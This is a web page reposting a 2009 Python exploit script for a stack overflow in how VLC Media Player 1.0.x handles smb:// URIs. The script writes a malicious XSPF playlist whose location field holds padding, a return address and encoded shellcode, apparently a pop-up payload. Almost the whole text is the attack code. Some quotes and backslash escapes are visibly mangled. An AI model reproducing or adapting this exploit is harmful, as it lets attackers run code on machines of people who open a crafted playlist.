Home / os / win10

vlcmpuri-overflow.txt

Posted on 15 August 2009

#!/usr/bin/env python # VLC Media Player 1.0.01.0.1 smb:// URI Handling Remote Stack Overflow # Xpl By : Mountassif Moad # Thanks : His0ka - Simo-soft - v4 Team # Original : http://www.milw0rm.com/exploits/9427 # popup_msg=( "TY777777777777777777777777777777777QZjAXP0A0AkAAQ2AB2BB0" "BBABXP8ABuJIXkweaHrJwpf02pQzePMhyzWwSuQnioXPOHuBxKnaQlkO" "jpJHIvKOYokObPPwRN1uqt5PA") # from his0k4 exploit :d cose i lost the alpha encoder tool :s header1 = ("<?xml version="1.0" encoding="UTF-8"?> ") header1 += ("<playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> ") header1 += (" <title>Playlist</title> ") header1 += (" <trackList> ") header1 += (" <track> ") header1 += (" <location>smb://example.com@www.example.com/foo/#{") payload = ("x41" * 2 + "x42" * 4 + "x43" * 90 + "x33x52x48x7E" + popup_msg + "x45" * 43 ) header2 = ("}</location> "); header2 += (" <extension application="http://www.videolan.org/vlc/playlist/0"> "); header2 += (" <vlc:id>0</vlc:id> "); header2 += (" </extension> "); header2 += (" </track> "); header2 += (" </trackList> "); header2 += ("</playlist> "); try: f1 = open("vlc_1.0.X.xspf","w") f1.write(header1 + payload + header2) f1.close() print(" Exploit file created! ") except: print "Error"

 

TOP